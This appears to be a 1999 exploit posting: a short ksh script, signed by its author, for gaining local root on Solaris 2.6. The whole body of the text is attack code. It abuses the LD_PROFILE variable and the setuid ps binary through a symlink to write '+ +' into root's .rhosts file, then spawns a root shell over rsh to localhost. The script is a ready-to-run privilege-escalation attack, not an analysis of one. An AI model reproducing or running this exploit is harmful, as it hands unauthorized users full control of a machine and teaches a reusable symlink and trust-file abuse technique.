Local root exploit for Solaris 2.6 through ps and way it handles $LD_PROFILE.
f506a2474914c827ec7a0c0bf71a2c49ecf7efebc987a21b65784bbd6935e068
works on solaris 2.6 sparc anyway...
#! /bin/ksh
# LD_PROFILE local root exploit for solaris
# steve@tightrope.demon.co.uk 19990922
umask 000
ln -s /.rhosts /var/tmp/ps.profile
export LD_PROFILE=/usr/bin/ps
/usr/bin/ps
echo + + > /.rhosts
rsh -l root localhost csh -i
--
1024/D9C69DF9 steve mynott steve@tightrope.demon.co.uk http://www.pineal.com/
those who do not understand unix are condemned to reinvent it, poorly.
-- henry spencer